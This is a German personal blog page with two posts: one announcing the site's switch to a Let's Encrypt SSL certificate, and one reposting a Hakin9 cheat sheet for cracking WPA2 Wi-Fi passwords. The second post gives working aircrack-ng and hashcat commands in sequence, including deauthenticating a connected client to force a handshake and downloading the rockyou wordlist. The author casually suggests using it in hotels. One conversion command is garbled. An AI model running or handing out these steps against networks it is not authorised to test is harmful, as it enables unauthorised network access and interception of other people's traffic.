dg7abl.de endlich mit SSL

Die Webseite ist nun auch sicher über eine verschlüsselte SSL- Verbindung zu erreichen. Ich verwende ein einfaches letsencrypt Zertifikat.

Das Zertifikat muss alle 3 Monate erneuert werden. Die Seite ist auch nur noch über https erreichbar. http ist abgeschaltet. Safety first.

WPA2 hacken

Das WPA2 schon längst nicht mehr sicher ist, wissen wir alle.

Heute ist mir wieder eine nette Befehlsübersicht über den Weg gelaufen, kann man ja mal gebrauchen, im Hotel oder so….:

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 — bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## crack password with aircrack-ng… ########### 

download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## or crack password with naive-hashcat ##########

#  convert cap to hccapxcap2hc
capx.bin capture/-01.cap capture/-01.hccapx

# crack with naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Das Original kommt von Hakin9 und die Erklärungen dazu gibt es hier.